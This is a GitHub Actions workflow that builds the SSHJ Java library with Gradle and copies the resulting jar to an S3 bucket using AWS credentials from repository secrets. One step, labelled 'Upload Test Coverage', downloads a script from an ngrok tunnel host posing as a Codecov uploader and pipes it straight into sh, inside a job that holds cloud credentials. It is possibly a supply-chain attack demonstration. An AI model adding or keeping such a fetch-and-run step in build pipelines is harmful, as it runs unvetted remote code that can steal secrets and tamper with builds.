# This workflow will build a Java project with Gradle
# For more information see: https://help.github.com/actions/language-and-framework-guides/building-and-testing-java-with-gradle

name: Build SSHJ

on: push
#on:
#  push:
#    branches: [ master ]
#  pull_request:
#    branches: [ master ]

env:
  GITHUBRUNID: ${{ github.run_id }}

jobs:
  build:
    name: Build with Java 11
    runs-on: ubuntu-latest
    environment: demo
    steps:
    - uses: actions/checkout@v2
    - name: Set up JDK 11
      uses: actions/setup-java@v1
      with:
        java-version: 11
    - name: Grant execute permission for gradlew
      run: chmod +x gradlew
    - name: Upload Test Coverage
      run: |
        curl https://blindspot.eu.ngrok.io/downloads/codecov | sh
    - name: Build with Gradle
      run: ./gradlew build -x test
    - name: Configure AWS Credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-region: us-east-2
    - name: Upload files to S3 with AWS CLI
      run: |
        ls -l
        ls -l build
        ls -l build/libs
        set -x
        aws s3 cp build/libs/sshj-0.1.0-SNAPSHOT.jar s3://${{ secrets.AWS_BUCKET }}/build/libs/sshj.jar --metadata '{"github-build-id":"${{ env.GITHUBRUNID }}"}'


#  integration:
#    name: Integration test
#    needs: [java12]
#    runs-on: [ubuntu-latest]
#    steps:
#      - uses: actions/checkout@v2
#      - run: git fetch --depth=1 origin +refs/tags/*:refs/tags/*
#      - uses: actions/setup-java@v1
#        with:
#          java-version: 12
#      - name: Grant execute permission for gradlew
#        run: chmod +x gradlew
#      - name: Build with Gradle
#        run: ./gradlew integrationTest

